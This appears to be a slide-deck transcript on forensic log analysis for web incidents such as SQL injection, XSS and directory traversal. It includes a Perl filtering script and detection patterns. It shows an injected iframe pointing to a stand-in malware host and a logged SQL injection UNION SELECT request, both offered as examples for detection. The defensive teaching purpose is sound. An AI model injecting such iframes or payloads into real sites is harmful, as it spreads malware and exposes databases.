Incident Handing in a Web Driven World

Transcript Incident Handing in a Web Driven World

Incident Handling & Log Analysis
in a Web Driven World
Manindra Kishore
Web Incidents - Overview
• A Glimpse of popular web based incidents
• Discussion of a sample incident
• Approach to Incident Analysis
A glimpse of few popular incidents
•
•
•
•
•
•
•
•
•
•
•
SQL injection
XSS
CSRF
Broken authentication
Broken authorization
File inclusion
Password brute force
Directory traversal
Malicious file upload
Network enumeration
…………….
A few Attack Objectives
• Force connection to malware infected
remote site
• Trick user into connecting to phishing site
• Steal data from backend database
• Obtain sensitive information from other
internal machines
• A common attack vector --- SQL
Injection
A sample incident:
Malware Download / Visit Phishing sites
• SQL Injection to change values in the
backend DB
• Values changed to known malware
distributing sites
• Each time page loads - Malware
downloaded
• Multiple systems under attacker control
Web site distributes malware
Exploits
<html>
<body>
.
and
Adds
.
.
.
http://bank.com/homepage.jsp
iframe Tag
Home Page
gets infected
<iframe src
<iframe src
=“http://malware.com/malware">
=“http://malware.com/malware">
</iframe> </iframe>
.
.
http://bank.com/homepage.jsp
Infected page
served to user
Accesses
in page http://bank.com/homepage.jsp
and finds out vulnerabilities
</body>
</html>
UserID & PswdUser
`
http://bank.com/homepage.jsp
Connection made to external site and
malware gets downloaded in
background
Infected page
Access request
Incident occurred !!!
What to do now?
A sample victimized 2 tier network
•
The web server on intranet got hacked.
•
I don’t know what else got hacked.
•
I want Incident Analysis.
Acting ahead…
• Enumerate all entry points of network
• Identify the components associated with
victimized component in network traffic
• Obtain logs of all associated components
• Perform Log Analysis
• This presentation focuses primarily on the attacks over the
internet.
• Analysis of Intranet based attacks involve more or less the
same steps not on the key focus here.
Candidates for Log Analysis
(in this case)
• Cisco Internet Router
• Cisco PIX Internet
Firewall:
• Juniper Intranet Firewall
• Cisco L3 switch
connecting all other
servers
• IIS 6.0 Web Server
• Tomcat Application
Server
• Microsoft SQL Server
Database
Grounds for forensics:
Log Analysis
A re-look at the attacks traceable by logs
A glimpse of major attacks for which forensics can be done by different sets of logs:
•
SQL Injection
•
XSS
•
SSI Injection
•
Directory Traversal Attack
•
PHP Remote File Inclusion Attack
•
Upload Malicious Files
•
Re-direction Attack
•
Unwanted Apps/Directories open to Internet
•
Misusing link for activation/authentication
•
Brute Forcing
•
Enumerating Data based on error messages/app features
•
Session Hijack
•
Deep URL
•
Change Password
•
Automated Attacks
•
Response Splitting Attack
•
Arbitrary HTTP methods allowed
Mapping Attack patterns to Logs
SQL Injection in the application retrieving data
Web Logs/Database Logs
SQL Injection in the application injecting Iframe into database
Web Logs/Database Logs
Persistent XSS on website
Web Logs/Database Logs/Database Backup
PHP Local and Remote File inclusion to obtain source code and passwords
Web Logs/Source Code
PHP Code Injection to retrieve database password
Web Logs/Database Logs
Anonymous FTP / brute force passwords and steal backup stored
FTP Logs
Direct connection to the Database and retrieve data
Database Logs/OS Logs
Files available on the website found through directory browsing
Web Logs
Brute forcing SAM file , RDP in and stealing database
OS Logs
Upload an executable which will take a backup of the database and dump it out
Web Logs/OS Logs/Database Logs
Vulnerability inside the application which allows DB backup/restore
Application Logs/Database Logs
Identification of all other network services and check if any other way in
Individual Network Service Logs
File upload of malicious file
Web Logs/OS Logs/Database Logs
Compromise of another server and gain access to this server through a
vulnerability there or by trust abuse of that server
Network Device Logs (Firewall + Switch)
Physical access to the server and copying data on removable media
OS Logs
Choosing the right Log for analysis
• Different device logs help in forensics of
different attack patterns
• Focusing on Internet based attacks, the
major components for analysis are
– Web Server
– Database Server
Individual Analysis of elements
The components under discussion
• Web Servers
– IIS
– Apache
• Database Servers
– MySQL
– MSSQL
Web Server – Log Analysis – Step 1
• Web Server Logs are huge
• Filter the relevant logs for analysis – Script
based approach
– Eliminate all requests for non-existing files on webserver
• Obtain the list of all valid files from webpage source code
• Obtain all requests from the webserver with 200_OK response
• Do the matching, filter only relevant requests, eliminate the rest.
Example –
• In a banking website we see a request for 3Dgames.php in the
Apache log – its obviously not valid.
• This can be confirmed by looking inside the source code
directory and checking if there indeed was a file called
3Dgames.php.
• If not then we don't need to waste time analyzing those
requests.
• A little bit of Basic Perl can help here.
A sample Perl Script
A sample script for finding out valid PHP pages - Can be modified for other types as well.
SCRIPT
#!/usr/bin/perl
open(PAGE , "<page_list") or die "Cannot open file:$!";
@all_pages = <PAGE>;
close(PAGE);
open(ALLPHP , "<gateway_only200_OK") or die "Cannot open file:$!";
@all_php_requests = <ALLPHP>;
close(ALLPHP);
open(VALIDPHP , ">all_valid_php") or die "Cannot open file:$!";
for ($j=0; $j<=$#all_pages; $j++){
chomp($all_pages[$j]);
@ddd = grep(/$all_pages[$j]/ , @all_php_requests);
print VALIDPHP @ddd;
}
close(VALIDPHP);
Web Server – Log Analysis – Step 2
• Identifying Valid Variables – In Remaining
requests
– List all the valid variables from page source code – Script
based approach
– Compare all the requests for presence of all valid variables
– If any invalid variable found in a request, eliminate the
request
– Eventually, filter out all requests with all valid variables
A sample Perl Script output
204.9.126.178 - [05/Aug/2009:11:31:54 -0500]
"GET
/category.php?q=%27+UNION+SELECT+TABLE_CATALOG%2C+TABLE_SCHEMA
%2C+&catid=search&searchgo.x=17&searchgo.y=12 HTTP/1.1"
-------------------•
The variables here are - q, catid, searchgo.x and searchgo.y
•
The requested page is - category.php
•
Now look at the list of valid variable from source code of page – category.php (script
based approach)
•
Figure out if the variables in request figure out here
•
If not, then its not a valid request and can be eliminated
•
Repeat the process for all requests (Script based approach as a whole)
•
Eventually, filter out all request with valid variables
Web Server – Log Analysis – Step 3
Identify specific attack patterns - using a Log Parsing
tool
• Example:
– While trying to detect a directory traversal attack one needs
to parse the logs for the ‘../../’ pattern among others.
• Sample queries to carry out parsing process:
The Demos
•
•
•
•
•
•
SQL Injection
Cross Site Scripting (XSS) – Persistent
Directory Traversal
PHP remote file inclusion
URL Redirection
Automated / Brute Force attacks
–
–
–
–
Password cracking
Automated registrations
Session prediction
Directory brute forcing
DB Server – Log Analysis
• Attacks that can be detected by looking at
the logs of a DB Server
– SQL Injection
– XSS
– Brute Forcing the DB Server
Log Analysis – MySQL DB Server
•
SQL Injection
1. Obtain the Query Logs. They are generally
available in ‘/mysql/data/’
2. Do a Code Review of the application and list down
all the SQL queries from all pages on the
application.
3. Match all the Queries in the Query Log with those
obtained from code review. All queries which match
are valid queries. The rest are invalid queries. Store
all these invalid queries in a separate file as these
are most probably the queries that an attacker used
for SQL Injection.
Sample Grep Queries
Sample Grep queries to perform the action:
•
Cross Site Scripting (XSS) : Persistent
1. Parse the database for any instance of XSS. This
can be done by pattern matching.
2. Note down all the XSS strings found in the DB
3. Check the DB Query Log for instances of the string
noted down. This can be done using the grep
command.
• Exact elements for monitoring
– Search for all these elements as follows:
<a>
href
<iframe>
src, url
<embed>
src, pluginspage, pluginurl, href
<object>
archive, classid, codebase, data usemap
<script>
src
<img>
longdesc, src, usemap
<applet>
code, codebase, archive
<area>
href, coords
More Attack Patterns
• Brute Forcing the DB Server
– Go through the Error Logs in order to see if
there are repeated failed attempts in limited
time duration.
What do we achieve…?
• Advantages of doing Log Analysis this way
• What have we not covered here and hope
to cover in the future?
Questions welcomed…
Thank You.
Manindra Kishore
Information Security Analyst / Consultant
[email protected]